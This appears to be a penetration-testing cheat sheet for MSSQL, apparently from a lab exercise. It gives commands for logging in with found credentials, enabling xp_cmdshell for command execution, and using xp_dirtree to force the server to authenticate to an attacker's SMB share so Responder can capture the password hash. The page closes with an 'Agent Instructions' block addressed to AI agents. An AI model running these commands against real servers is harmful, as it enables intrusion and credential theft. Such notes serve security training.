# 1433 - Pentesting MSSQL ## Authentication with Creds ``` impacket-mssqlclient klendathu.vl/zim:football22@10.10.179.150 -windows-auth ``` ## RCE in MSSQL ### xp\_cmdshell First We can try to enable xp\_cmdshell and then run commands easily ```python enable_xp_cmdshell # this enables xp_cmdshell xp_cmdshell whoami # whoami command works ``` ### UNC Path Injection (xp\_dirtree) we can use xp\_dirtree to authenticate to our own smb share, in this case we will be able to get the hash of the sql server user and then we can either relay the hash or crack the hash ```python # On MSSQL Server xp_dirtree //10.10.8.85/doesnotexists # OR exec master.sys.xp_dirtree '\\10.10.8.85\doesnotexists',1,1 # On kali Linux sudo responder -I tun0 # you should get a hash on your responder ``` ### xp\_fileexist && sys.dm\_os\_file\_exists we can use file excist as well, and sys.dm\_os\_file\_exists to. In SQL Server 2017 xp\_fileexist was replaced by a dynamic funtion called sys.dm\_os\_file\_exists ```python xp_fileexist 'C:\' # Change this exec master.dbo.xp_fileExist 'adsnt.dll' # To this SELECT * FROM sys.dm_os_file_exists ('adsnt.dll') ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.programmersecurity.com/network-penetration-testing/1433-pentesting-mssql.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.